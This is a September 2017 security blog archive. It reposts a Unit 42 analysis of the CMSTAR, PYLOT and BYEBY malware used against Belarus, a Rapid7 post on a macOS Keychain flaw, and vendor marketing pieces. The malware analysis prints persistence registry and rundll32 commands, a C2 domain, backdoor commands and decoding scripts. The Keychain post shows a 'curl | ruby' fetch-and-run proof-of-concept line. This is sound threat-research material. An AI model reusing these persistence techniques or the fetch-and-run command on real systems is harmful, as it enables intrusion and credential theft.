Monthly Archives: September 2017


Threat Actors Target Government of Belarus Using CMSTAR Trojan

Category : Trend Micro

Palo Alto Networks Unit 42 has identified a series of phishing emails containing updated versions of the previously discussed CMSTAR malware family targeting various government entities in the country of Belarus.

We first reported on CMSTAR in spear phishing attacks in spring of 2015 and later in 2016.

In this latest campaign, we observed a total of 20 unique emails between June and August of this year that included two new variants of the CMSTAR Downloader. We also discovered two previously unknown payloads. These payloads contained backdoors that we have named BYEBY and PYLOT respectively.


Figure 1 Diagram of the attack sequence

Phishing Emails

Between June and August of this year, we observed a total of 20 unique emails being sent to the following email addresses:

Email Address Description
[.]by Press Service of the Ministry of Defense of the Republic of Belarus
[.]by Baranovichi Operational Management of the Armed Forces
[.]by Ministry of Defense of the Republic of Belarus
[.]by Ministry of Defense of the Republic of Belarus
[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus
[.]by Minsk Operational Administration of the Armed Forces
[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus
[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus
[.]by State Border Committee of the Republic of Belarus
[.]by International Security and Arms Control Department, Ministry of Foreign Affairs
ablameiko@mia[.]by Unknown. Likely used by the Ministry of Internal Affairs of the Republic of Belarus


These emails contained a series of subject lines, primarily revolving around the topic of Запад-2017 (‘West-2017’), also known in English as Zapad 2017. Zapad 2017 was a series of joint military exercises conducted by the Armed Forces of the Russian Federation and the Republic of Belarus, held from September 14th to 20th in 2017.

The full list of subject lines is as follows:

  • Fwd:Подготовка к Запад-2017 [Translation: Fwd:Preparing for the West-2017]
  • выпуск воспитанников [Translation: graduation]
  • К Запад-2017 [Translation: To West-2017]
  • Запад-2017 [Translation: West-2017]

An example of some of the previously mentioned emails may be seen below.


Figure 2 Phishing email sent to Belarus government (1/2)


Figure 3 Phishing email sent to Belarus government (2/2)

Decoy Documents

We observed that the attachments used in these emails contained a mixture of file types: RTF documents, Microsoft Word documents, and a RAR archive. The RAR archive contained a series of images, a decoy document, and a Microsoft Windows executable. The executable has a .scr file extension and is designed to look like a Windows folder, as seen below:


Figure 4 Payload disguising itself as a Microsoft Windows folder

The rough translation of the folder and file names above are ‘Preparations for large-scale West-2017 exercises in this format are being held for the first time.’ Within the actual folder, there are a series of JPG images, as well as a decoy document with a title that is translated to ‘Thousands of Russian and Belarusian military are involved in the training of the rear services.’


Figure 5 Embedded images and decoy document within RAR

The decoy document contains the following content:


Figure 6 Decoy document within RAR

The other RTF and Word documents used additional decoy documents, which can be seen below.


Figure 7 Decoy document with translation (1/2)


Figure 8 Decoy document with translation (2/2)

While we observed different techniques being used for delivery, all attachments executed a variant of the CMSTAR malware family. We observed minor changes between variants, which we discuss in the CMSTAR Variations and Payloads section of the blog post.

The Word documents, which we track as Werow, employ malicious macros for their delivery. More information about these macros may be found in the Appendix of the blog post. Additionally, we have included a script that extracts these embedded payloads that can also be found in the Appendix.

The RTF documents made use of CVE-2015-1641. This vulnerability, patched in 2015, allows attackers to execute malicious code when these specially crafted documents are opened within vulnerable instances of Microsoft Word. The payload for these samples is embedded within them and obfuscated using a 4-byte XOR key of 0xCAFEBABE. We have included a script that can be used to extract the underlying payload of these RTFs statically that can be found in the Appendix.

The SCR file mentioned previously drops a CMSTAR DLL and runs it via an external call to rundll32.exe.

CMSTAR Variations and Payloads

In total, we observed three variations of CMSTAR in these recent attacks against Belarusian targets. The biggest change between them is a minor modification to the string obfuscation routine: the constant used in the subtraction step differs between the variants, as shown below:


Figure 9 String obfuscation modifications between CMSTAR variants

The older variation, named CMSTAR.A, was discussed in a previous blog post entitled, “Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government.”

The CMSTAR.B variant was witnessed using both a different mutex from CMSTAR.A and a slightly modified string obfuscation routine. The mutexes used by CMSTAR ensure that only one instance of the malware runs at a time. The CMSTAR.C variant used the same mutex as CMSTAR.B, but again used another slightly modified string obfuscation routine. We found all CMSTAR variants using the same obfuscation routine when a payload was downloaded from a remote server. We have included a tool to extract mutex and C2 information from all three CMSTAR variants, as well as a tool to decode the downloaded payload: both may be found in the Scripts section.

An example of CMSTAR downloading its payload may be found below:


Figure 10 Example HTTP download by CMSTAR

When expanding the research to identify additional CMSTAR.B and CMSTAR.C variants, we identified a total of 31 samples. Of these 31 samples, we found two unique payloads served from three of the C2 URLs, one of which was downloaded from a sample found in the phishing attacks previously described. Both payloads contained previously unknown malware families. We have named the payload found in the email campaign PYLOT, and the malware downloaded from the additional CMSTAR samples BYEBY.

Both malware families acted as backdoors, allowing the attackers to execute commands on the victim machine, as well as a series of other functions. More information about these individual malware families may be found in the appendix.


During the course of this research, we identified a phishing campaign consisting of 20 unique emails targeting the government of Belarus. The ploys used in these email and decoy documents revolved around a joint strategic military exercise of the Armed Forces of the Russian Federation and the Republic of Belarus, which took place between September 14th and September 20th of this year. While looking at the emails in question, we observed two new variants of the CMSTAR malware family. Between the samples identified and others we found while expanding our research scope, we identified two previously unknown malware families.

Palo Alto customers are protected from this threat in the following ways:

  • Tags have been created in AutoFocus to track CMSTAR, BYEBY, and PYLOT
  • All observed samples are identified as malicious in WildFire
  • Domains observed to act as C2s have been flagged as malicious
  • Traps 4.1 identifies and blocks the CVE-2015-1641 exploit used in these documents
  • Traps 4.1 blocks the macros used in the malicious Word documents

A special thanks to Tom Lancaster for his assistance on this research.


Werow Macro Analysis

The attacker used the same macro dropper in all of the observed Microsoft Word documents we analyzed for this campaign. It begins by building the following path strings:

  • %APPDATA%\d.doc
  • %APPDATA%\Microsoft\Office\WinCred.acl

The ‘d.doc’ path will be used to store a copy of the Word document, while the ‘WinCred.acl’ will contain the dropped payload, which is expected to be a DLL.


Figure 11 Macro used to drop CMSTAR

Werow uses rudimentary obfuscation to hide and re-assemble the following strings:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinCred
  • rundll32 %APPDATA%\Microsof\Office\WinCred.acl ,WinCred

These strings will be used at the end of the macro’s execution to ensure persistence via the Run registry key.

The malware proceeds to read an included overlay within the original Word document from a given offset. This data is decoded using an XOR operation, as well as an addition operation. It can be represented in Python as follows:

Once this overlay is decoded, it is written to the ‘WinCred.acl’ file and loaded with the ‘WinCred’ export. A script has been provided in the Scripts section that, in conjunction with oletools, can statically extract the embedded DLL payload from these documents.

RTF Shellcode Analysis

The RTF documents delivered in this attack campaign appear to be created by the same builder. All of the RTF files attempt to exploit CVE-2015-1641 to execute shellcode on the targeted system. Please reference for more information.

The shellcode executed after successful exploitation begins by resolving the API functions it requires by enumerating the API functions within loaded modules in the current process. It then builds the following list of values (ROR7 hash, hash XOR 0x10ADBEEF, resolved API name):

1a22f51 110f91be WinExec
741f8dc4 64b2332b WriteFile
94e43293 84498c7c CreateFileA
daa7fe52 ca0a40bd UnmapViewOfFile
dbacbe43 cb0100ac SetFilePointer
ec496a9e fce4d471 GetEnvironmentVariableA
ff0d6657 efa0d8b8 CloseHandle

The shellcode then enumerates the API functions, subjects each name to a ROR7 hashing routine and XORs the resulting hash with 0x10ADBEEF. It compares the result against the list of values above to find the API functions it requires to carry out its functionality.
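Reconstructing that hash scheme lets an analyst turn the bare constants in a shellcode blob back into API names, which is how the table above is produced and how a triage rule can recognise the same resolver in other samples. The script below is an added example, not code from the Unit 42 post. Its one assumption is the exact routine: rotate the 32-bit accumulator right by 7, add the next ASCII byte, no string terminator, then XOR with 0x10ADBEEF. That routine reproduces the WinExec and WriteFile rows of the table exactly; the candidate name list is an illustrative stand-in for a module's full export table.

```python
# Added example, not part of the Unit 42 report: reconstruct and reverse the
# import-hash scheme the RTF shellcode uses. Assumption: h = ror32(h, 7) + byte
# over the ASCII name with no terminator, then XORed with 0x10ADBEEF. This
# reproduces the WinExec (1a22f51 / 110f91be) and WriteFile (741f8dc4 / 64b2332b)
# rows of the table above.

MASK32 = 0xFFFFFFFF
XOR_MASK = 0x10ADBEEF

# Constants exactly as they appear in the shellcode (middle column of the table).
SHELLCODE_CONSTANTS = [
    0x110F91BE, 0x64B2332B, 0x84498C7C, 0xCA0A40BD,
    0xCB0100AC, 0xFCE4D471, 0xEFA0D8B8,
]

# Candidate export names. A real run feeds the full export table of kernel32.dll
# (and whatever other modules the shellcode walks); this short list is illustrative.
CANDIDATE_APIS = [
    "WinExec", "WriteFile", "CreateFileA", "UnmapViewOfFile", "SetFilePointer",
    "GetEnvironmentVariableA", "CloseHandle",
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "ReadFile",
]


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror7_hash(name: str) -> int:
    """Raw ROR7 hash of an export name (first column of the table)."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 7) + byte) & MASK32
    return h


def obfuscated_hash(name: str) -> int:
    """Hash as stored in the shellcode (second column of the table)."""
    return ror7_hash(name) ^ XOR_MASK


def build_lookup(names):
    """Map stored constant -> export name for every candidate name."""
    return {obfuscated_hash(n): n for n in names}


def resolve_constants(constants, names):
    """Resolve each shellcode constant to a name, or None when no candidate matches."""
    lookup = build_lookup(names)
    return [(c, lookup.get(c)) for c in constants]


if __name__ == "__main__":
    for const, name in resolve_constants(SHELLCODE_CONSTANTS, CANDIDATE_APIS):
        print(f"{const:08x} -> {name or '<unresolved: extend CANDIDATE_APIS>'}")
```

Because the XOR mask is applied after hashing, the same `build_lookup` table serves any sample that reuses this resolver; a sample that changes only the mask can be fingerprinted by XORing a known constant (for example the one that should be WinExec) with `ror7_hash("WinExec")`.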

After resolving the API functions, the shellcode then begins searching for the embedded payload and decoy within the initial RTF file. It does so by searching the RTF file for three delimiters, specifically 0xBABABABABABA, 0xBBBBBBBB and 0xBCBCBCBC, which the shellcode uses to find the encrypted payload and decoy. The shellcode then decrypts the payload by XOR’ing four bytes at a time with the key 0xCAFEBABE, and decrypts the decoy by XOR’ing four bytes at a time using the key 0xBAADF00D. Here is a visual representation of the delimiters and embedded files:


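The same delimiter-and-XOR layout makes the payload easy to recover statically, without letting the document run. The carver below is an added example and not the extraction script the post refers to. The delimiter values and both XOR keys come from the description above; the ordering (payload between the 0xBABABABABABA and 0xBBBBBBBB markers, decoy between 0xBBBBBBBB and 0xBCBCBCBC) and the little-endian dword application of the keys are assumptions, and the sample RTF it carves is constructed inline.

```python
# Added example, not the Unit 42 script: statically carve the payload and decoy
# out of an RTF built the way the write-up describes. Delimiters and XOR keys are
# from the report; the ordering below is an assumption:
#   [rtf text] BA*6 [payload ^ 0xCAFEBABE] BB*4 [decoy ^ 0xBAADF00D] BC*4 [rtf text]
# Keys are applied as little-endian dwords, i.e. 0xCAFEBABE is the byte run BE BA FE CA.
import struct

PAYLOAD_START = bytes.fromhex("BABABABABABA")
PAYLOAD_END = bytes.fromhex("BBBBBBBB")   # doubles as the start of the decoy
DECOY_END = bytes.fromhex("BCBCBCBC")
PAYLOAD_KEY = 0xCAFEBABE
DECOY_KEY = 0xBAADF00D


def xor_dwords(data: bytes, key: int) -> bytes:
    """XOR data four bytes at a time with a little-endian dword key.
    A trailing partial dword is XORed with the leading key bytes."""
    key_bytes = struct.pack("<I", key)
    return bytes(b ^ key_bytes[i % 4] for i, b in enumerate(data))


def _span(blob: bytes, start_marker: bytes, end_marker: bytes, offset: int = 0):
    """Return (begin, end) of the data between two markers, searching from offset."""
    s = blob.find(start_marker, offset)
    if s == -1:
        raise ValueError(f"start marker {start_marker.hex()} not found")
    begin = s + len(start_marker)
    e = blob.find(end_marker, begin)
    if e == -1:
        raise ValueError(f"end marker {end_marker.hex()} not found")
    return begin, e


def carve(rtf: bytes):
    """Return (payload, decoy) decoded from the RTF, or raise ValueError."""
    p_begin, p_end = _span(rtf, PAYLOAD_START, PAYLOAD_END)
    d_begin, d_end = _span(rtf, PAYLOAD_END, DECOY_END, p_end)
    payload = xor_dwords(rtf[p_begin:p_end], PAYLOAD_KEY)
    decoy = xor_dwords(rtf[d_begin:d_end], DECOY_KEY)
    if not payload.startswith(b"MZ"):
        # The report says the payload is a DLL; anything else means the layout guess is off.
        raise ValueError("decoded payload does not start with an MZ header")
    return payload, decoy


def build_sample(payload: bytes, decoy: bytes) -> bytes:
    """Constructed test input in the assumed layout (the inverse of carve)."""
    return (b"{\\rtf1 constructed sample "
            + PAYLOAD_START + xor_dwords(payload, PAYLOAD_KEY)
            + PAYLOAD_END + xor_dwords(decoy, DECOY_KEY)
            + DECOY_END + b" }")


if __name__ == "__main__":
    sample = build_sample(b"MZ\x90\x00constructed payload bytes", b"{\\rtf1 decoy document}")
    payload, decoy = carve(sample)
    print(len(payload), "payload bytes;", decoy.decode())
```

The MZ check is what turns a guessed layout into a verified one: if the bytes between the markers do not decode to a PE header, the ordering or key assumption is wrong for that sample and the carver says so instead of handing back garbage.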
After decrypting the payload, it saves the file to the following location:


The shellcode then creates the following registry key to automatically run the payload each time the system starts:

Software\Microsoft\Windows\CurrentVersion\Run : Microsoft

The shellcode saves the following command to this autorun key, which will execute the OutL12.pip payload, specifically calling its ‘WinCred’ exported function:


The shellcode will then overwrite the original delivery document with the decrypted decoy contents and open the new document.

PYLOT Analysis

This malware family was named via a combination of the DLL’s original name of ‘pilot.dll’, along with the fact that it downloads files with a Python (.py) file extension.

PYLOT begins by being loaded as a DLL with the ServiceMain export. It proceeds to create the following two folders within the %TEMP% path:

  • KB287640
  • KB887209

PYLOT continues to load and decode an embedded resource file. This file contains configuration information that is used by the malware throughout its execution. The following script, written in Python, may be used to decode this embedded resource object:

Looking at the decoded data, we see the following:


Figure 12 Decoded embedded configuration information

The malware continues to collect the following information from the victim computer:

  • Computer name
  • IP addresses present on the machine
  • MAC addresses
  • Microsoft Windows version information
  • Windows code page identifier information

This information is used to generate a unique hash for the victim machine. PYLOT then begins entering its C2 handler routine, where it will use HTTP for communication with the remote host.

Data sent to the remote C2 server is encrypted using RC4 with the previously shown key of ‘BBidRotnqQpHfpRTi8cR.’ It is then further obfuscated by base64-encoding this encrypted string. An example of this HTTP request containing this data can be seen below.



Figure 13 HTTP request made by PYLOT to remote server

The decrypted data sent in the request above is as follows. Note that this custom data format has not been fully identified; however, we are able to see various strings, including the embedded configuration string of ‘fGAka0001’, as well as the victim hash of ‘100048048.’


Figure 14 Decrypted data sent by PYLOT to remote server

The base64-encoded string at the end of the data contains the collected victim machine information from earlier, separated by a ‘|’ delimiter.
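For anyone holding a capture of this traffic, the two encoding layers above are enough to get at the cleartext. The decoder below is an added example, not tooling from the Unit 42 post: it strips the outer base64, applies RC4 with the configuration key shown earlier, and then pulls the trailing base64 token apart on its ‘|’ delimiter. The request body it decodes is constructed inline; the header bytes in front of the victim token are an invented stand-in, since the report does not describe that part of the format.

```python
# Added example, not part of the Unit 42 report: decode a PYLOT request body.
# Layering per the write-up: base64( RC4(key, data) ), with the victim
# information as a '|'-delimited, base64-encoded token at the end of `data`.
import base64
import binascii
import re

PYLOT_RC4_KEY = b"BBidRotnqQpHfpRTi8cR"   # key from the decoded configuration (Figure 12)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_request_body(body: str) -> bytes:
    """Undo PYLOT's two layers: base64 on the outside, RC4 underneath."""
    return rc4(PYLOT_RC4_KEY, base64.b64decode(body))


def encode_request_body(plaintext: bytes) -> str:
    """Inverse of decode_request_body; used here only to build the constructed sample."""
    return base64.b64encode(rc4(PYLOT_RC4_KEY, plaintext)).decode("ascii")


def extract_victim_fields(plaintext: bytes):
    """Pull the trailing base64 token out of the decrypted data and split it on '|'.
    Assumes the token is preceded by a non-base64 byte; returns [] if nothing decodes."""
    m = re.search(rb"[A-Za-z0-9+/]+={0,2}$", plaintext)
    if not m:
        return []
    try:
        return base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace").split("|")
    except binascii.Error:
        return []


def build_constructed_sample() -> str:
    """A constructed request body. Only the two layers, the key, the config string
    'fGAka0001' and the victim hash '100048048' come from the report; the NUL
    separators and the victim values are invented for this example."""
    victim = b"WIN-CONSTRUCTED|192.0.2.10|00-11-22-33-44-55|6.1|1251"
    plaintext = b"fGAka0001\x00100048048\x00" + base64.b64encode(victim)
    return encode_request_body(plaintext)


if __name__ == "__main__":
    body = build_constructed_sample()
    plain = decode_request_body(body)
    print(plain)
    print(extract_victim_fields(plain))
```

The RC4 routine is the textbook one, so any deviation in a future sample (a modified KSA, a key read from a different resource) will show up as garbage after the first layer rather than as a subtly wrong field list; checking that the decrypted data still contains the configuration string is a cheap sanity test before trusting the parsed fields.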

The remote C2 server responds using the same data format. An example response can be seen below.


Figure 15 Response from remote C2 server

The decoded data at the end of the response contains various URIs to be used by the malware to receive commands, as well as other information that has yet to be fully researched.

A number of commands have been identified within PYLOT, including the following:
  • Download batch script
  • Run batch script
  • Delete file
  • Rename file
  • Execute file
  • Download file
  • Upload file

BYEBY Analysis

BYEBY was named based on a string within the malware itself. Most strings found within this malware are concatenated to 6 characters. One such example was an instance where a debug string contained ‘BYE BY’, which was likely a concatenated form of the phrase ‘BYE BYE’.

This malware is loaded as a DLL, with an export name of ServiceMain. When the malware is initially loaded, it begins by checking to see if it is running within either of the following paths:

  • [SYSTEM32]\svchost.exe
  • [SYSTEM32]\rundll32.exe

If it finds itself not running in either location, it will immediately exit. This is likely a technique used to bypass various sandboxing systems. Should it find itself running as svchost.exe, it will write the current timestamp and a value of ‘V09SS010’ (Base64 Decoded: ‘WORKMN’) to a file named ‘’ within the user’s local %TEMP% folder. This file acts as a log file and is written to frequently throughout the malware’s execution.

When the malware runs within the context of svchost.exe, it bypasses the installation routines and immediately enters the C2 handler.

When BYEBY is run within the context of rundll32.exe, it expects itself to be running for the first time. As such, it will register itself as a service with a name of ‘VideoSrv.’ After this service is created, BYEBY proceeds to enter its C2 handler function in a new thread.

BYEBY uses TLS for network communication, connecting to the following host on port 443:

  • oeiowidfla22[.]com

After the initial connection is established, BYEBY will collect the following system information and upload it to the remote C2:

  • Hostname
  • IP Address
  • Embedded String of ‘WinVideo’
  • Major Windows Version
  • Minor Windows Version
  • Embedded String of ‘6.1.7603.16000’

The malware is configured to accept a number of commands. These appear to be Base64-encoded strings that, when decoded, provide their true meaning. Only the beginning of each command is checked. The Base64-decoded strings have been included for the benefit of the reader.

  • aGVsbG8h [Decoded: hello!]
  • R09PREJZ [Decoded: GOODBY]
  • TElTVCBE [Decoded: LIST D]
  • U1RBUlRD [Decoded: STARTC]
  • Q09NTUFO [Decoded: COMMAN]
  • VFJBTlNG [Decoded: TRANSF]
  • RVhFQ1VU [Decoded: EXECUT]

A mapping of commands and their descriptions has been provided:

Command Description
aGVsbG8h Authenticate with the remote C2 server.
R09PREJZ Close socket connection with remote server.
TElTVCBE List drives on the victim machine.
U1RBUlRD Start an interactive shell on the victim machine.
Q09NTUFO Execute a command in the interactive shell
VFJBTlNG Upload or download files to the victim machine.
RVhFQ1VU Execute command in a new process.


We created multiple scripts during the course of our research. We are sharing them here to assist other researchers or defenders that encounter this malware.

  • Script to extract the embedded CMSTAR payload from Word documents.
  • Script to extract the embedded CMSTAR payload from RTFs.
  • Script to identify possible mutex and C2 strings from CMSTAR variants.
  • Script to decode a payload downloaded by CMSTAR.

Indicators of Compromise

CMSTAR Variants Identified in Phishing Campaign

CMSTAR Download Locations in Phishing Campaign

CMSTAR.B Download Locations

CMSTAR.C Download Locations



macOS Keychain Security, What You Need To Know

Category : Rapid7

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you’ve likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the “keychain” without an associated privilege escalation prompt. Patrick also has a more in-depth Q&A blog post about the vulnerability.

Let’s pull back a bit to provide sufficient background on why you should be concerned.

What is the macOS Keychain?

Without going into fine-grained detail, the macOS Keychain is a secure password management system developed by Apple. It’s been around a while (back when capital letters ruled the day in “Mac OS”) and can hold virtually anything. It’s used to store website passwords, network share credentials, passphrases for wireless networks, and encrypted disk images; you can even use it to store notes securely.

A more “TL;DR” version of that is “The macOS Keychain likely has the passwords to all your email, social media, banking and other websites—as well as for local network shares and your WiFi.”

Most users access Keychain data through applications, but you can use the Keychain Access GUI utility to add, change, or delete entries. Here’s a sample dialog containing credentials for a fake application called (unimaginatively enough) “forexample”:

The password is not displayed by default. You need to tick the “Show password:” box and a prompt will appear:

Enter your system password and you’ll see the password:

That’s a central part of the Keychain — you provide authority for accessing Keychain elements, even to the application that maintains the secrets for you.

Apple has also provided command-line access to work with the keychain via the security command. Here’s what the listing looks like for this example:

$ security find-generic-password -s forexample
keychain: "/Users/me/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
    0x00000007 <blob>="forexample"
    0x00000008 <blob>=<NULL>
    "cdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"
    "mdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"

Again, the secret data is not visible.

As you may have surmised, Apple also provides programmatic access to the Keychain.

iOS, tvOS (etc) all use a similar keychain for storing secrets.

Before we jump into the news from September 25th, 2017, let’s fire up Apple’s Time Machine and go back about four years…

A (Very) Brief History of Keyjacking

Rapid7’s own Erran Carey put together a proof-of-concept for “keyjacking” your Keychain a little over four years ago.

If you run:

curl -L | ruby

You’ll get prompted to unlock the keychain:

which will enable the Ruby script to decrypt all the secrets.

There’s another related, older vulnerability that involved using a bit more AppleScript to trick the system into allowing unfettered access to Keychain data (that vulnerability no longer exists).

So, What’s Different Now?

Patrick’s video shows him running an unsigned application that was downloaded from a remote source. The usual macOS prompts come up to warn you that running said apps is a bad idea, and when you enable execution a dialog comes up with a button. The user in the video (presumably Patrick) presses said button and some time passes, then a file with a full, cleartext export of the entire Keychain is scrolled through.

As indicated, many bad things had to happen before the secrets were revealed:

  • the Security System Preferences had to be modified to allow you to run unsigned third-party apps on your system
  • you had to download a program from some site or load/run it from USB (et al) drive
  • you had to say “OK” one more time to Apple’s warning that what you are about to do is a bad idea

Sure, registered/signed apps could perform the same malicious function, but that’s less likely since Apple can tie the signed app to the developer (or developer’s system) that created it.

What Can I Do?

It looks like this vulnerability has been around for a while. macOS Sierra and the just-released High Sierra are both vulnerable to this attack; El Capitan is also reported to be vulnerable.

Since you’re likely running El Capitan or Sierra, upgrading to High Sierra isn’t going to put you further at risk. In fact, High Sierra includes security patches and additional security features that make it worth the upgrade. Bottom line: don’t let this vulnerability alone prevent you from upgrading to High Sierra if you’re on El Capitan or Sierra. However, you might want to consider a completely fresh install versus an upgrade. Why? Read on!

macOS “power users” will not like the following advice, but you should consider performing a fresh install of High Sierra and starting from a completely fresh system, then migrating signed applications and data over. It’s the next bit that really hurts, though. Don’t install any unsigned third-party apps or any apps via MacPorts or Homebrew until Apple patches the vulnerability. Why? Well, there’s a chance Patrick is not the only one who found this vulnerability, and attackers may try to work up their own exploits before Apple has a chance to release a fix. In fact, they may already have (which is one reason we suggested not just doing an upgrade).

And, Apple is working on a fix — Patrick responsibly informed them — but there was no time to bake it in before this week’s official release. Using any unsigned third-party code could put your secrets at risk. You should also be wary of running signed code that you download outside the Mac App Store. Apple’s gatekeeping is not perfect, but it’s better than the total absence of gatekeeping that comes with downloads from uncontrolled websites.

Rapid7 researchers will be monitoring for other proof-of-concept (PoC) code that exploits this vulnerability (Patrick did not release his PoC code into the wild) and will be waiting and watching for Apple’s first macOS patch release — they released 10.13.1 betas to developers today — to fix this critical issue.


Author: Bob Rudis


Extend Cloud Resources to the Azure-Ready Edge

Category : Riverbed

Riverbed has been optimizing application delivery over any distance to remote locations for over 15 years. We know that these remote and branch offices (ROBOs) are the engines that drive organizations; however, maintaining a mix of cloud-based and on-prem infrastructure to deliver applications and data has stretched IT resources to keep up with the demands of the business. Recent research from ESG indicates that over 91% of IT professionals say that incorporating cloud-based applications into their portfolio of corporate applications has increased the complexity associated with managing ROBOs.

Sneak preview of Azure-Ready Edge at Microsoft Ignite 2017….

In partnership with Microsoft, Riverbed will introduce the Azure Ready Edge in early 2018 to address these challenges for IT Leaders. The solution extends the benefits of Azure cloud storage to edge sites by delivering flexible, secure, and anytime/anywhere application access to augment or completely eliminate traditional data center infrastructure.


Please come visit the Riverbed booth (#709) at Microsoft Ignite for a demo preview of this game changing solution. We will showcase the following:

  • The simplicity of Azure-to-edge operations with Hyper-V based VMs and Azure storage instantly provisioned to any site
  • Instant site or data recovery in the Azure cloud to any edge site
  • Enhanced orchestration workflow to manage multiple environments

The Riverbed SteelFusion solution has already made the concept of Zero Edge IT a reality for over 1200 enterprises with traditional data center or hybrid cloud environments. In 2014 when we introduced SteelFusion, we likened it to a smartphone where all your productivity apps, contacts, and personal data are consolidated in the cloud. There’s no need for a backpack full of servers and storage that you’d have to tote around wherever you went. This concept applies even more so today with Edge Computing gaining momentum as the preferred operational model for more organizations. The Azure-Ready Edge will be the ideal solution for this shift.






Machine Learning for Threat Detection, Hype vs. Reality

Category : Trend Micro

Thursday, October 5, 2017, 1:00 p.m. EDT
Machine learning is an important technique being leveraged to improve ransomware detection rates. Register to join us for this live webinar.
You’ll hear from Eric Skinner, VP of Market Strategy, as he outlines why machine learning is effective relative to other techniques, but also how to mitigate its main weakness, false positives. You’ll also learn how malware authors are reacting to the rise of machine learning and how defenses will evolve next.


The Attack on Enterprises for PII and The Need for User Behavior Analytics (UBA)

Category : HP Security

Information is the key. Information is what executives, employees, buyers, sellers, competition, and partners are in search of. Hackers are also in search of this same information and more. The information for individuals and enterprises is at the center of every business and security division worldwide.  The protection of this information is key.  The personally identifiable information (PII) companies have for their customers, clients, employees, and transactions is extremely valuable.  The cyber-attack and cybercrime statistics are across the news:

The steps to protect PII within organizations and to be aware of the possibility of insider leaks is at the forefront of security operations (SecOps) and security operations centers (SOC) globally.  The focus of cybercrime has begun its shift away from vulnerabilities within hardware and software and has shifted to focusing on people.  Malware, phishing attacks, ransomware and other methods have become the central focus for hackers and the “bad guys”.  There is also a threat of irregular behavior by employees that can lead to the release of PII, credentials, critical company information and resources.  Companies and SecOps teams need to strengthen their stance on these threats which affect their enterprise as much, if not more, than external attacks.


As a solution to internal security concerns and threats of the release of information, enterprises have begun to employ security information and event management (SIEM) and user behavior analytics (UBA) solutions within their environment. SIEM solutions allow organizations to detect known threats from threat intelligence collected and implemented into the environment. UBA solutions allow organizations to track insider behavior through machine learning to identify data leaks, account compromise, or insider abuse. Through the detection of anomalies in insider behavior, companies are able to stay ahead of potential breaches.

Another critical factor in the protection of PII for companies is the increase in remote workers. Remote workers are more prevalent as companies grow and expand their presence, and these workers often utilize non-traditional methods for accessing company resources. Through UBA, companies are able to monitor worker activity, patterns, and behavior to ensure security throughout their environment.

Protecting PII for internal use, customers, and clients is of the utmost importance for enterprises. Implementing intelligent solutions with adaptability, analytical capabilities, and customization allows organizations to protect themselves from known threats outside of the environment and also from insider threats by employees and resources.

ArcSight Enterprise Security Manager (ESM)

ArcSight Enterprise Security Manager is a comprehensive real-time threat detection, analysis, workflow, and compliance management platform with increased data enrichment capabilities. ArcSight detects and directs analysts to cyber-security threats, in real time, helping SecOps teams respond quickly to indicators of compromise.  By automatically identifying and prioritizing threats, teams avoid the cost, complexity and extra work associated with being alerted of false positives. ESM allows SecOps organizations the ability to have a centralized, powerful view into their multiple environments creating workflow efficiency for streamlined processes.  Through improved detection, real-time correlation, and workflow automation, SOC teams can resolve incidents quickly and accurately.

ArcSight User Behavior Analytics (UBA)

ArcSight analytics solutions enable enterprises to detect advanced cyberattacks in real-time, giving security teams the insights needed to investigate and remediate threats quickly. Working symbiotically with SIEM technology, our solutions analyze and correlate every event across your IT environment, prioritize the highest risks, and display the resulting data in a customizable dashboard. An advanced analytics solution giving enterprises visibility into their users, network, data, and applications. ArcSight Analytics makes it much easier to gain information and anticipate, recognize, and mitigate threats.

For more information on SIEM award-winning ArcSight ESM, please visit:

For more information on ArcSight User Behavior Analytics, please visit:


Author: Ray McKenzie


Building a Security Risk Management Program

Category : Imperva

The frequency of data breaches today highlights the need to peel back the onion on security programs and identify a laser-focused mission and ultimate goal. As a compliance manager, I know the horror stories first hand.

Let’s take a deeper dive into security and risk management basics to enable your program to add value for your business and help prevent breaches.

Security Risk Management Foundations

It all starts with a fundamental management-supported, skilled and budgeted security program.  Security programs are not a cut and paste of your neighbors’ security program.  Each program is unique, and must be tailored to your organization and its risks, forming an integral component of an enterprise risk management (ERM) program.

The goal is to identify areas of risk to the organization, its people, processes, technology and environment, and to drive management to implement controls to limit the exposure.  This, like any risk program, plays a trifecta balancing game between the risk, cost and benefit.

How ISO 27001 Can Help

The ISO 27001 jump starts a program by providing a well-structured framework for developing an Information Security Management System (ISMS), driven by solid corporate requirements (see Figure 1).  The ISO 27001 contains the key areas required by a security program, in addition to the details that are required within each area.  Well accepted internationally, it helps satisfy customer requests for solid security programs—and future certification (if this is your goal).

Figure 1: Corporate risk drivers help determine the requirements for your security risk management program.

Knowing your organization is a huge advantage over an outsider: you know the people, the culture, the IT infrastructure and the assets, and you may even know the regulatory and legal requirements for information security. Knowing the processes, how things work (or how you think they do), is a big advantage, but it is only the beginning.

Meetings with key management and teams across the organization solidify connections and generate a detailed picture of the organization, its risk status and the controls across existing processes. The data collected, once analyzed, provides input into the ISMS program: assets, risk owners, control owners, risks, and more. You will find that time brings success if you stay engaged in the process.

